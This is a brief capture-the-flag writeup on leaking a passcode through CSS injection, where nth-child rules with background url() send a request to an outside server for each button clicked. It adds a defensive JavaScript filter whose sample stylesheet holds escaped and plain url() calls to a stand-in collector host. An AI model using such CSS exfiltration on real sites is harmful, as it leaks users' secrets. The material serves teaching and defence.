Tags: css xss 

[https://gist.github.com/sqrtrev/e033c934444dc48d009ea3ed8dca54d3](https://gist.github.com/sqrtrev/e033c934444dc48d009ea3ed8dca54d3)

First, I tried to find a way to leak the flag via CSS from the h3 tag (because the flag is stored in an h3 tag), something like CSS attribute selector injection.
But when I read the server-side code, I found a passcode that is fixed, produced by the generate function. This function just shuffles some letters, and the passcode consists of letters with no duplicates.

Therefore, once we leak the passcode, we can reuse it on our client side to get the flag.
So I used CSS nth-child to give each button its own rule with a background: url that makes a request to my server.
After I submit my payload, the bot makes a request to my server for each passcode character as it clicks the buttons.

So we can recover the passcode by combining the request logs.

Passcode: AD14BF65EC093728

![log](https://pbs.twimg.com/media/E30idIyVcAIADt2?format=png&name=medium)
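
The defensive counterpart of the technique above, as an added example that is not part of the original writeup or the challenge code: a checker that reports submitted CSS rules whose url() or @import targets leave the site's origin. `ALLOWED_ORIGIN`, the function names and the sample stylesheet are constructed assumptions.

```javascript
// Added example: report user-supplied CSS rules that would make the browser
// fetch from another origin. ALLOWED_ORIGIN and SAMPLE_CSS are constructed.
const ALLOWED_ORIGIN = "https://notes.example";

// Decode CSS backslash escapes and drop comments so neither can hide "url(".
function normalizeCss(css) {
  return css
    .replace(/\/\*[\s\S]*?\*\//g, " ")
    .replace(/\\([0-9a-fA-F]{1,6})\s?|\\([^\n])/g, (_, hex, ch) => {
      if (!hex) return ch;
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? "\ufffd" : String.fromCodePoint(cp);
    });
}

// True when the browser would leave ALLOWED_ORIGIN to fetch `target`.
function isCrossOrigin(target) {
  try {
    const u = new URL(target, ALLOWED_ORIGIN + "/");
    if (u.protocol === "data:") return false; // inline data, no network request
    return u.origin !== ALLOWED_ORIGIN;
  } catch {
    return true; // unparsable target: fail closed
  }
}

// Return [{selector, target}] for every url()/@import that leaves the origin.
function findCrossOriginLoads(css) {
  const text = normalizeCss(css);
  const hits = [];
  for (const m of text.matchAll(/@import\s+(?:url\(\s*)?["']?([^"')\s;]+)/gi)) {
    if (isCrossOrigin(m[1])) hits.push({ selector: "@import", target: m[1] });
  }
  for (const rule of text.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    for (const m of rule[2].matchAll(/url\(\s*["']?([^"')\s]+)/gi)) {
      if (isCrossOrigin(m[1])) hits.push({ selector: rule[1].trim(), target: m[1] });
    }
  }
  return hits;
}

// Constructed sample: one local image, two per-button remote loads, one data: URL.
const SAMPLE_CSS = `
h3 { color: #333; background: url(/static/paper.png); }
button:nth-child(1) { background: url(https://collector.example/hit?n=1); }
button:nth-child(2) { background: \\75 rl("//collector.example/hit?n=2"); }
.icon { background: url(data:image/gif;base64,R0lGODlhAQABAAAAACw=); }
`;
console.log(findCrossOriginLoads(SAMPLE_CSS));
```

Serving the page with a Content-Security-Policy whose `img-src` and `style-src` are limited to `'self'` blocks the same background-image and @import requests in the browser even if a rule slips past the filter.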

Original writeup (https://twitter.com/sqrtrev/status/1404313247281401858).